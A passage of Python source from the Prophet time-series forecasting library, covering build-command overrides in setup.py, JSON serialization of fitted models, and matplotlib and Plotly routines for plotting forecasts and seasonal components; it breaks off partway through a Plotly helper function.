BDistWheelABINone(bdist_wheel): def finalize_options(self): bdist_wheel.finalize_options(self) self.root_is_pure = False def get_tag(self): _, _, plat = bdist_wheel.get_tag(self) return "py3", "none", plat about = {} here = Path(__file__).parent.resolve() with open(here / "prophet" / "__version__.py", "r") as f: exec(f.read(), about) setup( version=about["__version__"], packages=find_packages(), zip_safe=False, include_package_data=True, ext_modules=[Extension("prophet.stan_model", [])], cmdclass={ "build_ext": BuildExtCommand, "build_py": BuildPyCommand, "editable_wheel": EditableWheel, "bdist_wheel": BDistWheelABINone, }, test_suite="prophet.tests", ) File: python/prophet/serialize.py # -*- coding: utf-8 -*- # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. 
from __future__ import absolute_import, division, print_function from collections import OrderedDict from copy import deepcopy from io import StringIO import json from pathlib import Path import numpy as np import pandas as pd from prophet.forecaster import Prophet about = {} here = Path(__file__).parent.resolve() with open(here / "__version__.py", "r") as f: exec(f.read(), about) SIMPLE_ATTRIBUTES = [ 'growth', 'n_changepoints', 'specified_changepoints', 'changepoint_range', 'yearly_seasonality', 'weekly_seasonality', 'daily_seasonality', 'seasonality_mode', 'seasonality_prior_scale', 'changepoint_prior_scale', 'holidays_prior_scale', 'mcmc_samples', 'interval_width', 'uncertainty_samples', 'y_scale', 'y_min', 'scaling', 'logistic_floor', 'country_holidays', 'component_modes', 'holidays_mode' ] PD_SERIES = ['changepoints', 'history_dates', 'train_holiday_names'] PD_TIMESTAMP = ['start'] PD_TIMEDELTA = ['t_scale'] PD_DATAFRAME = ['holidays', 'history', 'train_component_cols'] NP_ARRAY = ['changepoints_t'] ORDEREDDICT = ['seasonalities', 'extra_regressors'] def model_to_dict(model): """Convert a Prophet model to a dictionary suitable for JSON serialization. Model must be fitted. Skips Stan objects that are not needed for predict. Can be reversed with model_from_dict. Parameters ---------- model: Prophet model object. Returns ------- dict that can be used to serialize a Prophet model as JSON or loaded back into a Prophet model. """ if model.history is None: raise ValueError( "This can only be used to serialize models that have already been fit." ) model_dict = { attribute: getattr(model, attribute) for attribute in SIMPLE_ATTRIBUTES } # Handle attributes of non-core types for attribute in PD_SERIES: if getattr(model, attribute) is None: model_dict[attribute] = None else: model_dict[attribute] = getattr(model, attribute).to_json( orient='split', date_format='iso' ) for attribute in PD_TIMESTAMP: model_dict[attribute] = getattr(model, attribute).timestamp() for attribute in PD_TIMEDELTA: model_dict[attribute] = getattr(model, attribute).total_seconds() for attribute in PD_DATAFRAME: if getattr(model, attribute) is None: model_dict[attribute] = None else: model_dict[attribute] = getattr(model, attribute).to_json(orient='table', index=False) for attribute in NP_ARRAY: model_dict[attribute] = getattr(model, attribute).tolist() for attribute in ORDEREDDICT: model_dict[attribute] = [ list(getattr(model, attribute).keys()), getattr(model, attribute), ] # Other attributes with special handling # fit_kwargs -> Transform any numpy types before serializing. # They do not need to be transformed back on deserializing. fit_kwargs = deepcopy(model.fit_kwargs) if 'init' in fit_kwargs: for k, v in fit_kwargs['init'].items(): if isinstance(v, np.ndarray): fit_kwargs['init'][k] = v.tolist() elif isinstance(v, np.floating): fit_kwargs['init'][k] = float(v) model_dict['fit_kwargs'] = fit_kwargs # Params (Dict[str, np.ndarray]) model_dict['params'] = {k: v.tolist() for k, v in model.params.items()} # Attributes that are skipped: stan_fit, stan_backend model_dict['__prophet_version'] = about["__version__"] return model_dict def model_to_json(model): """Serialize a Prophet model to json string. Model must be fitted. Skips Stan objects that are not needed for predict. Can be deserialized with model_from_json. Parameters ---------- model: Prophet model object. Returns ------- json string that can be deserialized into a Prophet model. 
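    A typical round trip is sketched below; ``m`` is assumed to be a Prophet
    model that has already been fit::

        >>> with open('serialized_model.json', 'w') as fout:
        ...     fout.write(model_to_json(m))
        >>> with open('serialized_model.json', 'r') as fin:
        ...     m_loaded = model_from_json(fin.read())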
""" model_json = model_to_dict(model) return json.dumps(model_json) def _handle_simple_attributes_backwards_compat(model_dict): """Handle backwards compatibility for SIMPLE_ATTRIBUTES.""" # prophet<1.1.5: handle scaling parameters introduced in #2470 if 'scaling' not in model_dict: model_dict['scaling'] = 'absmax' model_dict['y_min'] = 0. # prophet<1.1.5: handle holidays_mode parameter introduced in #2477 if 'holidays_mode' not in model_dict: model_dict['holidays_mode'] = model_dict['seasonality_mode'] def model_from_dict(model_dict): """Recreate a Prophet model from a dictionary. Recreates models that were converted with model_to_dict. Parameters ---------- model_dict: Dictionary containing model, created with model_to_dict. Returns ------- Prophet model. """ model = Prophet() # We will overwrite all attributes set in init anyway # Simple types _handle_simple_attributes_backwards_compat(model_dict) for attribute in SIMPLE_ATTRIBUTES: setattr(model, attribute, model_dict[attribute]) for attribute in PD_SERIES: if model_dict[attribute] is None: setattr(model, attribute, None) else: s = pd.read_json(StringIO(model_dict[attribute]), typ='series', orient='split') if s.name == 'ds': if len(s) == 0: s = pd.to_datetime(s) s = s.dt.tz_localize(None) setattr(model, attribute, s) for attribute in PD_TIMESTAMP: setattr(model, attribute, pd.Timestamp.utcfromtimestamp(model_dict[attribute]).tz_localize(None)) for attribute in PD_TIMEDELTA: setattr(model, attribute, pd.Timedelta(seconds=model_dict[attribute])) for attribute in PD_DATAFRAME: if model_dict[attribute] is None: setattr(model, attribute, None) else: df = pd.read_json(StringIO(model_dict[attribute]), typ='frame', orient='table', convert_dates=['ds']) if attribute == 'train_component_cols': # Special handling because of named index column df.columns.name = 'component' df.index.name = 'col' setattr(model, attribute, df) for attribute in NP_ARRAY: setattr(model, attribute, np.array(model_dict[attribute])) for attribute in ORDEREDDICT: key_list, unordered_dict = model_dict[attribute] od = OrderedDict() for key in key_list: od[key] = unordered_dict[key] setattr(model, attribute, od) # Other attributes with special handling # fit_kwargs model.fit_kwargs = model_dict['fit_kwargs'] # Params (Dict[str, np.ndarray]) model.params = {k: np.array(v) for k, v in model_dict['params'].items()} # Skipped attributes model.stan_backend = None model.stan_fit = None return model def model_from_json(model_json): """Deserialize a Prophet model from json string. Deserializes models that were serialized with model_to_json. Parameters ---------- model_json: Serialized model string Returns ------- Prophet model. """ model_dict = json.loads(model_json) return model_from_dict(model_dict) File: python/prophet/plot.py # -*- coding: utf-8 -*- # Copyright (c) Facebook, Inc. and its affiliates. # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. from __future__ import absolute_import, division, print_function import logging import numpy as np import pandas as pd from prophet.diagnostics import performance_metrics logger = logging.getLogger('prophet.plot') try: from matplotlib import pyplot as plt from matplotlib.dates import ( MonthLocator, num2date, AutoDateLocator, AutoDateFormatter, ) from matplotlib.ticker import FuncFormatter from pandas.plotting import deregister_matplotlib_converters deregister_matplotlib_converters() except ImportError: logger.error('Importing matplotlib failed. 
Plotting will not work.') try: import plotly.graph_objs as go from plotly.subplots import make_subplots except ImportError: logger.error('Importing plotly failed. Interactive plots will not work.') def plot( m, fcst, ax=None, uncertainty=True, plot_cap=True, xlabel='ds', ylabel='y', figsize=(10, 6), include_legend=False ): """Plot the Prophet forecast. Parameters ---------- m: Prophet model. fcst: pd.DataFrame output of m.predict. ax: Optional matplotlib axes on which to plot. uncertainty: Optional boolean to plot uncertainty intervals, which will only be done if m.uncertainty_samples > 0. plot_cap: Optional boolean indicating if the capacity should be shown in the figure, if available. xlabel: Optional label name on X-axis ylabel: Optional label name on Y-axis figsize: Optional tuple width, height in inches. include_legend: Optional boolean to add legend to the plot. Returns ------- A matplotlib figure. """ user_provided_ax = False if ax is None else True if ax is None: fig = plt.figure(facecolor='w', figsize=figsize) ax = fig.add_subplot(111) else: fig = ax.get_figure() fcst_t = fcst['ds'] ax.plot(m.history['ds'], m.history['y'], 'k.', label='Observed data points') ax.plot(fcst_t, fcst['yhat'], ls='-', c='#0072B2', label='Forecast') if 'cap' in fcst and plot_cap: ax.plot(fcst_t, fcst['cap'], ls='--', c='k', label='Maximum capacity') if m.logistic_floor and 'floor' in fcst and plot_cap: ax.plot(fcst_t, fcst['floor'], ls='--', c='k', label='Minimum capacity') if uncertainty and m.uncertainty_samples: ax.fill_between(fcst_t, fcst['yhat_lower'], fcst['yhat_upper'], color='#0072B2', alpha=0.2, label='Uncertainty interval') # Specify formatting to workaround matplotlib issue #12925 locator = AutoDateLocator(interval_multiples=False) formatter = AutoDateFormatter(locator) ax.xaxis.set_major_locator(locator) ax.xaxis.set_major_formatter(formatter) ax.grid(True, which='major', c='gray', ls='-', lw=1, alpha=0.2) ax.set_xlabel(xlabel) ax.set_ylabel(ylabel) if include_legend: ax.legend() if not user_provided_ax: fig.tight_layout() return fig def plot_components( m, fcst, uncertainty=True, plot_cap=True, weekly_start=0, yearly_start=0, figsize=None ): """Plot the Prophet forecast components. Will plot whichever are available of: trend, holidays, weekly seasonality, yearly seasonality, and additive and multiplicative extra regressors. Parameters ---------- m: Prophet model. fcst: pd.DataFrame output of m.predict. uncertainty: Optional boolean to plot uncertainty intervals, which will only be done if m.uncertainty_samples > 0. plot_cap: Optional boolean indicating if the capacity should be shown in the figure, if available. weekly_start: Optional int specifying the start day of the weekly seasonality plot. 0 (default) starts the week on Sunday. 1 shifts by 1 day to Monday, and so on. yearly_start: Optional int specifying the start day of the yearly seasonality plot. 0 (default) starts the year on Jan 1. 1 shifts by 1 day to Jan 2, and so on. figsize: Optional tuple width, height in inches. Returns ------- A matplotlib figure. 
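    Example sketch, assuming a fitted model ``m`` and a forecast frame
    ``fcst = m.predict(future)``::

        >>> fig = plot_components(m, fcst)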
""" # Identify components to be plotted components = ['trend'] if m.train_holiday_names is not None and 'holidays' in fcst: components.append('holidays') # Plot weekly seasonality, if present if 'weekly' in m.seasonalities and 'weekly' in fcst: components.append('weekly') # Yearly if present if 'yearly' in m.seasonalities and 'yearly' in fcst: components.append('yearly') # Other seasonalities components.extend([ name for name in sorted(m.seasonalities) if name in fcst and name not in ['weekly', 'yearly'] ]) regressors = {'additive': False, 'multiplicative': False} for name, props in m.extra_regressors.items(): regressors[props['mode']] = True for mode in ['additive', 'multiplicative']: if regressors[mode] and 'extra_regressors_{}'.format(mode) in fcst: components.append('extra_regressors_{}'.format(mode)) npanel = len(components) figsize = figsize if figsize else (9, 3 * npanel) fig, axes = plt.subplots(npanel, 1, facecolor='w', figsize=figsize) if npanel == 1: axes = [axes] multiplicative_axes = [] dt = m.history['ds'].diff() min_dt = dt.iloc[dt.values.nonzero()[0]].min() for ax, plot_name in zip(axes, components): if plot_name == 'trend': plot_forecast_component( m=m, fcst=fcst, name='trend', ax=ax, uncertainty=uncertainty, plot_cap=plot_cap, ) elif plot_name in m.seasonalities: if ( (plot_name == 'weekly' or m.seasonalities[plot_name]['period'] == 7) and (min_dt == pd.Timedelta(days=1)) ): plot_weekly( m=m, name=plot_name, ax=ax, uncertainty=uncertainty, weekly_start=weekly_start ) elif plot_name == 'yearly' or m.seasonalities[plot_name]['period'] == 365.25: plot_yearly( m=m, name=plot_name, ax=ax, uncertainty=uncertainty, yearly_start=yearly_start ) else: plot_seasonality( m=m, name=plot_name, ax=ax, uncertainty=uncertainty, ) elif plot_name in [ 'holidays', 'extra_regressors_additive', 'extra_regressors_multiplicative', ]: plot_forecast_component( m=m, fcst=fcst, name=plot_name, ax=ax, uncertainty=uncertainty, plot_cap=False, ) if plot_name in m.component_modes['multiplicative']: multiplicative_axes.append(ax) fig.tight_layout() # Reset multiplicative axes labels after tight_layout adjustment for ax in multiplicative_axes: ax = set_y_as_percent(ax) return fig def plot_forecast_component( m, fcst, name, ax=None, uncertainty=True, plot_cap=False, figsize=(10, 6) ): """Plot a particular component of the forecast. Parameters ---------- m: Prophet model. fcst: pd.DataFrame output of m.predict. name: Name of the component to plot. ax: Optional matplotlib Axes to plot on. uncertainty: Optional boolean to plot uncertainty intervals, which will only be done if m.uncertainty_samples > 0. plot_cap: Optional boolean indicating if the capacity should be shown in the figure, if available. figsize: Optional tuple width, height in inches. 
Returns ------- a list of matplotlib artists """ artists = [] if not ax: fig = plt.figure(facecolor='w', figsize=figsize) ax = fig.add_subplot(111) fcst_t = fcst['ds'].dt.to_pydatetime() artists += ax.plot(fcst_t, fcst[name], ls='-', c='#0072B2') if 'cap' in fcst and plot_cap: artists += ax.plot(fcst_t, fcst['cap'], ls='--', c='k') if m.logistic_floor and 'floor' in fcst and plot_cap: ax.plot(fcst_t, fcst['floor'], ls='--', c='k') if uncertainty and m.uncertainty_samples: artists += [ax.fill_between( fcst_t, fcst[name + '_lower'], fcst[name + '_upper'], color='#0072B2', alpha=0.2)] # Specify formatting to workaround matplotlib issue #12925 locator = AutoDateLocator(interval_multiples=False) formatter = AutoDateFormatter(locator) ax.xaxis.set_major_locator(locator) ax.xaxis.set_major_formatter(formatter) ax.grid(True, which='major', c='gray', ls='-', lw=1, alpha=0.2) ax.set_xlabel('ds') ax.set_ylabel(name) if name in m.component_modes['multiplicative']: ax = set_y_as_percent(ax) return artists def seasonality_plot_df(m, ds): """Prepare dataframe for plotting seasonal components. Parameters ---------- m: Prophet model. ds: List of dates for column ds. Returns ------- A dataframe with seasonal components on ds. """ df_dict = {'ds': ds, 'cap': 1., 'floor': 0.} for name in m.extra_regressors: df_dict[name] = 0. # Activate all conditional seasonality columns for props in m.seasonalities.values(): if props['condition_name'] is not None: df_dict[props['condition_name']] = True df = pd.DataFrame(df_dict) df = m.setup_dataframe(df) return df def plot_weekly(m, ax=None, uncertainty=True, weekly_start=0, figsize=(10, 6), name='weekly'): """Plot the weekly component of the forecast. Parameters ---------- m: Prophet model. ax: Optional matplotlib Axes to plot on. One will be created if this is not provided. uncertainty: Optional boolean to plot uncertainty intervals, which will only be done if m.uncertainty_samples > 0. weekly_start: Optional int specifying the start day of the weekly seasonality plot. 0 (default) starts the week on Sunday. 1 shifts by 1 day to Monday, and so on. figsize: Optional tuple width, height in inches. name: Name of seasonality component if changed from default 'weekly'. Returns ------- a list of matplotlib artists """ artists = [] if not ax: fig = plt.figure(facecolor='w', figsize=figsize) ax = fig.add_subplot(111) # Compute weekly seasonality for a Sun-Sat sequence of dates. days = (pd.date_range(start='2017-01-01', periods=7) + pd.Timedelta(days=weekly_start)) df_w = seasonality_plot_df(m, days) seas = m.predict_seasonal_components(df_w) days = days.day_name() artists += ax.plot(range(len(days)), seas[name], ls='-', c='#0072B2') if uncertainty and m.uncertainty_samples: artists += [ax.fill_between(range(len(days)), seas[name + '_lower'], seas[name + '_upper'], color='#0072B2', alpha=0.2)] ax.grid(True, which='major', c='gray', ls='-', lw=1, alpha=0.2) ax.set_xticks(range(len(days))) ax.set_xticklabels(days) ax.set_xlabel('Day of week') ax.set_ylabel(name) if m.seasonalities[name]['mode'] == 'multiplicative': ax = set_y_as_percent(ax) return artists def plot_yearly(m, ax=None, uncertainty=True, yearly_start=0, figsize=(10, 6), name='yearly'): """Plot the yearly component of the forecast. Parameters ---------- m: Prophet model. ax: Optional matplotlib Axes to plot on. One will be created if this is not provided. uncertainty: Optional boolean to plot uncertainty intervals, which will only be done if m.uncertainty_samples > 0. 
yearly_start: Optional int specifying the start day of the yearly seasonality plot. 0 (default) starts the year on Jan 1. 1 shifts by 1 day to Jan 2, and so on. figsize: Optional tuple width, height in inches. name: Name of seasonality component if previously changed from default 'yearly'. Returns ------- a list of matplotlib artists """ artists = [] if not ax: fig = plt.figure(facecolor='w', figsize=figsize) ax = fig.add_subplot(111) # Compute yearly seasonality for a Jan 1 - Dec 31 sequence of dates. days = (pd.date_range(start='2017-01-01', periods=365) + pd.Timedelta(days=yearly_start)) df_y = seasonality_plot_df(m, days) seas = m.predict_seasonal_components(df_y) artists += ax.plot( df_y['ds'].dt.to_pydatetime(), seas[name], ls='-', c='#0072B2') if uncertainty and m.uncertainty_samples: artists += [ax.fill_between( df_y['ds'].dt.to_pydatetime(), seas[name + '_lower'], seas[name + '_upper'], color='#0072B2', alpha=0.2)] ax.grid(True, which='major', c='gray', ls='-', lw=1, alpha=0.2) months = MonthLocator(range(1, 13), bymonthday=1, interval=2) ax.xaxis.set_major_formatter(FuncFormatter( lambda x, pos=None: '{dt:%B} {dt.day}'.format(dt=num2date(x)))) ax.xaxis.set_major_locator(months) ax.set_xlabel('Day of year') ax.set_ylabel(name) if m.seasonalities[name]['mode'] == 'multiplicative': ax = set_y_as_percent(ax) return artists def plot_seasonality(m, name, ax=None, uncertainty=True, figsize=(10, 6)): """Plot a custom seasonal component. Parameters ---------- m: Prophet model. name: Seasonality name, like 'daily', 'weekly'. ax: Optional matplotlib Axes to plot on. One will be created if this is not provided. uncertainty: Optional boolean to plot uncertainty intervals, which will only be done if m.uncertainty_samples > 0. figsize: Optional tuple width, height in inches. Returns ------- a list of matplotlib artists """ artists = [] if not ax: fig = plt.figure(facecolor='w', figsize=figsize) ax = fig.add_subplot(111) # Compute seasonality from Jan 1 through a single period. 
start = pd.to_datetime('2017-01-01 0000') period = m.seasonalities[name]['period'] end = start + pd.Timedelta(days=period) plot_points = 200 days = pd.to_datetime(np.linspace(start.value, end.value, plot_points)) df_y = seasonality_plot_df(m, days) seas = m.predict_seasonal_components(df_y) artists += ax.plot(df_y['ds'].dt.to_pydatetime(), seas[name], ls='-', c='#0072B2') if uncertainty and m.uncertainty_samples: artists += [ax.fill_between( df_y['ds'].dt.to_pydatetime(), seas[name + '_lower'], seas[name + '_upper'], color='#0072B2', alpha=0.2)] ax.grid(True, which='major', c='gray', ls='-', lw=1, alpha=0.2) n_ticks = 8 xticks = pd.to_datetime(np.linspace(start.value, end.value, n_ticks) ).to_pydatetime() ax.set_xticks(xticks) if name == 'yearly': fmt = FuncFormatter( lambda x, pos=None: '{dt:%B} {dt.day}'.format(dt=num2date(x))) ax.set_xlabel('Day of year') elif name == 'weekly': fmt = FuncFormatter( lambda x, pos=None: '{dt:%A}'.format(dt=num2date(x))) ax.set_xlabel('Day of Week') elif name == 'daily': fmt = FuncFormatter( lambda x, pos=None: '{dt:%T}'.format(dt=num2date(x))) ax.set_xlabel('Hour of day') elif period <= 2: fmt = FuncFormatter( lambda x, pos=None: '{dt:%T}'.format(dt=num2date(x))) ax.set_xlabel('Hours') else: fmt = FuncFormatter( lambda x, pos=None: '{:.0f}'.format(pos * period / (n_ticks - 1))) ax.set_xlabel('Days') ax.xaxis.set_major_formatter(fmt) ax.set_ylabel(name) if m.seasonalities[name]['mode'] == 'multiplicative': ax = set_y_as_percent(ax) return artists def set_y_as_percent(ax): yticks = 100 * ax.get_yticks() yticklabels = ['{0:.4g}%'.format(y) for y in yticks] ax.set_yticks(ax.get_yticks().tolist()) ax.set_yticklabels(yticklabels) return ax def add_changepoints_to_plot( ax, m, fcst, threshold=0.01, cp_color='r', cp_linestyle='--', trend=True, ): """Add markers for significant changepoints to prophet forecast plot. Example: fig = m.plot(forecast) add_changepoints_to_plot(fig.gca(), m, forecast) Parameters ---------- ax: axis on which to overlay changepoint markers. m: Prophet model. fcst: Forecast output from m.predict. threshold: Threshold on trend change magnitude for significance. cp_color: Color of changepoint markers. cp_linestyle: Linestyle for changepoint markers. trend: If True, will also overlay the trend. Returns ------- a list of matplotlib artists """ artists = [] if trend: artists.append(ax.plot(fcst['ds'], fcst['trend'], c=cp_color)) signif_changepoints = m.changepoints[ np.abs(np.nanmean(m.params['delta'], axis=0)) >= threshold ] if len(m.changepoints) > 0 else [] for cp in signif_changepoints: artists.append(ax.axvline(x=cp, c=cp_color, ls=cp_linestyle)) return artists def plot_cross_validation_metric( df_cv, metric, rolling_window=0.1, ax=None, figsize=(10, 6), color='b', point_color='gray' ): """Plot a performance metric vs. forecast horizon from cross validation. Cross validation produces a collection of out-of-sample model predictions that can be compared to actual values, at a range of different horizons (distance from the cutoff). This computes a specified performance metric for each prediction, and aggregated over a rolling window with horizon. This uses prophet.diagnostics.performance_metrics to compute the metrics. Valid values of metric are 'mse', 'rmse', 'mae', 'mape', and 'coverage'. rolling_window is the proportion of data included in the rolling window of aggregation. The default value of 0.1 means 10% of data are included in the aggregation for computing the metric. 
As a concrete example, if metric='mse', then this plot will show the squared error for each cross validation prediction, along with the MSE averaged over rolling windows of 10% of the data. Parameters ---------- df_cv: The output from prophet.diagnostics.cross_validation. metric: Metric name, one of ['mse', 'rmse', 'mae', 'mape', 'coverage']. rolling_window: Proportion of data to use for rolling average of metric. In [0, 1]. Defaults to 0.1. ax: Optional matplotlib axis on which to plot. If not given, a new figure will be created. figsize: Optional tuple width, height in inches. color: Optional color for plot and error points, useful when plotting multiple model performances on one axis for comparison. Returns ------- a matplotlib figure. """ if ax is None: fig = plt.figure(facecolor='w', figsize=figsize) ax = fig.add_subplot(111) else: fig = ax.get_figure() # Get the metric at the level of individual predictions, and with the rolling window. df_none = performance_metrics(df_cv, metrics=[metric], rolling_window=-1) df_h = performance_metrics(df_cv, metrics=[metric], rolling_window=rolling_window) # Some work because matplotlib does not handle timedelta # Target ~10 ticks. tick_w = max(df_none['horizon'].astype('timedelta64[ns]')) / 10. # Find the largest time resolution that has <1 unit per bin. dts = ['D', 'h', 'm', 's', 'ms', 'us', 'ns'] dt_names = [ 'days', 'hours', 'minutes', 'seconds', 'milliseconds', 'microseconds', 'nanoseconds' ] dt_conversions = [ 24 * 60 * 60 * 10 ** 9, 60 * 60 * 10 ** 9, 60 * 10 ** 9, 10 ** 9, 10 ** 6, 10 ** 3, 1., ] for i, dt in enumerate(dts): if np.timedelta64(1, dt) < np.timedelta64(tick_w, 'ns'): break x_plt = df_none['horizon'].astype('timedelta64[ns]').view(np.int64) / float(dt_conversions[i]) x_plt_h = df_h['horizon'].astype('timedelta64[ns]').view(np.int64) / float(dt_conversions[i]) ax.plot(x_plt, df_none[metric], '.', alpha=0.1, c=point_color) ax.plot(x_plt_h, df_h[metric], '-', c=color) ax.grid(True) ax.set_xlabel('Horizon ({})'.format(dt_names[i])) ax.set_ylabel(metric) return fig def plot_plotly(m, fcst, uncertainty=True, plot_cap=True, trend=False, changepoints=False, changepoints_threshold=0.01, xlabel='ds', ylabel='y', figsize=(900, 600)): """Plot the Prophet forecast with Plotly offline. Plotting in Jupyter Notebook requires initializing plotly.offline.init_notebook_mode(): >>> import plotly.offline as py >>> py.init_notebook_mode() Then the figure can be displayed using plotly.offline.iplot(...): >>> fig = plot_plotly(m, fcst) >>> py.iplot(fig) see https://plot.ly/python/offline/ for details Parameters ---------- m: Prophet model. fcst: pd.DataFrame output of m.predict. uncertainty: Optional boolean to plot uncertainty intervals. plot_cap: Optional boolean indicating if the capacity should be shown in the figure, if available. trend: Optional boolean to plot trend changepoints: Optional boolean to plot changepoints changepoints_threshold: Threshold on trend change magnitude for significance. xlabel: Optional label name on X-axis ylabel: Optional label name on Y-axis Returns ------- A Plotly Figure. 
""" prediction_color = '#0072B2' error_color = 'rgba(0, 114, 178, 0.2)' # '#0072B2' with 0.2 opacity actual_color = 'black' cap_color = 'black' trend_color = '#B23B00' line_width = 2 marker_size = 4 data = [] # Add actual data.append(go.Scatter( name='Actual', x=m.history['ds'], y=m.history['y'], marker=dict(color=actual_color, size=marker_size), mode='markers' )) # Add lower bound if uncertainty and m.uncertainty_samples: data.append(go.Scatter( x=fcst['ds'], y=fcst['yhat_lower'], mode='lines', line=dict(width=0), hoverinfo='skip' )) # Add prediction data.append(go.Scatter( name='Predicted', x=fcst['ds'], y=fcst['yhat'], mode='lines', line=dict(color=prediction_color, width=line_width), fillcolor=error_color, fill='tonexty' if uncertainty and m.uncertainty_samples else 'none' )) # Add upper bound if uncertainty and m.uncertainty_samples: data.append(go.Scatter( x=fcst['ds'], y=fcst['yhat_upper'], mode='lines', line=dict(width=0), fillcolor=error_color, fill='tonexty', hoverinfo='skip' )) # Add caps if 'cap' in fcst and plot_cap: data.append(go.Scatter( name='Cap', x=fcst['ds'], y=fcst['cap'], mode='lines', line=dict(color=cap_color, dash='dash', width=line_width), )) if m.logistic_floor and 'floor' in fcst and plot_cap: data.append(go.Scatter( name='Floor', x=fcst['ds'], y=fcst['floor'], mode='lines', line=dict(color=cap_color, dash='dash', width=line_width), )) # Add trend if trend: data.append(go.Scatter( name='Trend', x=fcst['ds'], y=fcst['trend'], mode='lines', line=dict(color=trend_color, width=line_width), )) # Add changepoints if changepoints and len(m.changepoints) > 0: signif_changepoints = m.changepoints[ np.abs(np.nanmean(m.params['delta'], axis=0)) >= changepoints_threshold ] data.append(go.Scatter( x=signif_changepoints, y=fcst.loc[fcst['ds'].isin(signif_changepoints), 'trend'], marker=dict(size=50, symbol='line-ns-open', color=trend_color, line=dict(width=line_width)), mode='markers', hoverinfo='skip' )) layout = dict( showlegend=False, width=figsize[0], height=figsize[1], yaxis=dict( title=ylabel ), xaxis=dict( title=xlabel, type='date', rangeselector=dict( buttons=list([ dict(count=7, label='1w', step='day', stepmode='backward'), dict(count=1, label='1m', step='month', stepmode='backward'), dict(count=6, label='6m', step='month', stepmode='backward'), dict(count=1, label='1y', step='year', stepmode='backward'), dict(step='all') ]) ), rangeslider=dict( visible=True ), ), ) fig = go.Figure(data=data, layout=layout) return fig def plot_components_plotly( m, fcst, uncertainty=True, plot_cap=True, figsize=(900, 200)): """Plot the Prophet forecast components using Plotly. See plot_plotly() for Plotly setup instructions Will plot whichever are available of: trend, holidays, weekly seasonality, yearly seasonality, and additive and multiplicative extra regressors. Parameters ---------- m: Prophet model. fcst: pd.DataFrame output of m.predict. uncertainty: Optional boolean to plot uncertainty intervals, which will only be done if m.uncertainty_samples > 0. plot_cap: Optional boolean indicating if the capacity should be shown in the figure, if available. figsize: Set the size for the subplots (in px). Returns ------- A Plotly Figure. 
""" # Identify components to plot and get their Plotly props components = {} components['trend'] = get_forecast_component_plotly_props( m, fcst, 'trend', uncertainty, plot_cap) if m.train_holiday_names is not None and 'holidays' in fcst: components['holidays'] = get_forecast_component_plotly_props( m, fcst, 'holidays', uncertainty) regressors = {'additive': False, 'multiplicative': False} for name, props in m.extra_regressors.items(): regressors[props['mode']] = True for mode in ['additive', 'multiplicative']: if regressors[mode] and 'extra_regressors_{}'.format(mode) in fcst: components['extra_regressors_{}'.format(mode)] = get_forecast_component_plotly_props( m, fcst, 'extra_regressors_{}'.format(mode)) for seasonality in m.seasonalities: components[seasonality] = get_seasonality_plotly_props(m, seasonality) # Create Plotly subplot figure and add the components to it fig = make_subplots(rows=len(components), cols=1, print_grid=False) fig['layout'].update(go.Layout( showlegend=False, width=figsize[0], height=figsize[1] * len(components) )) for i, name in enumerate(components): if i == 0: xaxis = fig['layout']['xaxis'] yaxis = fig['layout']['yaxis'] else: xaxis = fig['layout']['xaxis{}'.format(i + 1)] yaxis = fig['layout']['yaxis{}'.format(i + 1)] xaxis.update(components[name]['xaxis']) yaxis.update(components[name]['yaxis']) for trace in components[name]['traces']: fig.append_trace(trace, i + 1, 1) return fig def plot_forecast_component_plotly(m, fcst, name, uncertainty=True, plot_cap=False, figsize=(900, 300)): """Plot an particular component of the forecast using Plotly. See plot_plotly() for Plotly setup instructions Parameters ---------- m: Prophet model. fcst: pd.DataFrame output of m.predict. name: Name of the component to plot. uncertainty: Optional boolean to plot uncertainty intervals, which will only be done if m.uncertainty_samples > 0. plot_cap: Optional boolean indicating if the capacity should be shown in the figure, if available. figsize: The plot's size (in px). Returns ------- A Plotly Figure. """ props = get_forecast_component_plotly_props(m, fcst, name, uncertainty, plot_cap) layout = go.Layout( width=figsize[0], height=figsize[1], showlegend=False, xaxis=props['xaxis'], yaxis=props['yaxis'] ) fig = go.Figure(data=props['traces'], layout=layout) return fig def plot_seasonality_plotly(m, name, uncertainty=True, figsize=(900, 300)): """Plot a custom seasonal component using Plotly. See plot_plotly() for Plotly setup instructions Parameters ---------- m: Prophet model. name: Seasonality name, like 'daily', 'weekly'. uncertainty: Optional boolean to plot uncertainty intervals, which will only be done if m.uncertainty_samples > 0. figsize: Set the plot's size (in px). Returns ------- A Plotly Figure. """ props = get_seasonality_plotly_props(m, name, uncertainty) layout = go.Layout( width=figsize[0], height=figsize[1], showlegend=False, xaxis=props['xaxis'], yaxis=props['yaxis'] ) fig = go.Figure(data=props['traces'], layout=layout) return fig def get_forecast_component_plotly_props(m, fcst, name, uncertainty=True, plot_cap=False): """Prepares a dictionary for plotting the selected forecast component with Plotly Parameters ---------- m: Prophet model. fcst: pd.DataFrame output of m.predict. name: Name of the component to plot. uncertainty: Optional boolean to plot uncertainty intervals, which will only be done if m.uncertainty_samples > 0. plot_cap: Optional boolean indicating if the capacity should be shown in the figure, if available. 
Returns ------- A dictionary with Plotly traces, xaxis and yaxis """ prediction_color = '#0072B2' error_color = 'rgba(0, 114, 178, 0.2)' # '#0072B2' with 0.2 opacity cap_color = 'black' zeroline_color = '#AAA' line_width = 2 range_margin = (fcst['ds'].max() - fcst['ds'].min()) * 0.05 range_x = [fcst['ds'].min() - range_margin, fcst['ds'].max() + range_margin] text = None mode = 'lines' if name == 'holidays': # Combine holidays into one hover text holidays = m.construct_holiday_dataframe(fcst['ds']) holiday_features, _, _ = m.make_holiday_features(fcst['ds'], holidays) holiday_features.columns = holiday_features.columns.str.replace('_delim_', '', regex=False) holiday_features.columns = holiday_features.columns.str.replace('+0', '', regex=False) text = pd.Series(data='', index=holiday_features.index) for holiday_feature, idxs in holiday_features.items(): text[idxs.astype(bool) & (text != '')] += '<br>' # Add newline if additional holiday text[idxs.astype(bool)] += holiday_feature traces = [] traces.append(go.Scatter( name=name, x=fcst['ds'], y=fcst[name], mode=mode, line=go.scatter.Line(color=prediction_color, width=line_width), text=text, )) if uncertainty and m.uncertainty_samples and (fcst[name + '_upper'] != fcst[name + '_lower']).any(): if mode == 'markers': traces[0].update( error_y=dict( type='data', symmetric=False, array=fcst[name + '_upper'], arrayminus=fcst[name + '_lower'], width=0, color=error_color ) ) else: traces.append(go.Scatter( name=name + '_upper', x=fcst['ds'], y=fcst[name + '_upper'], mode=mode, line=go.scatter.Line(width=0, 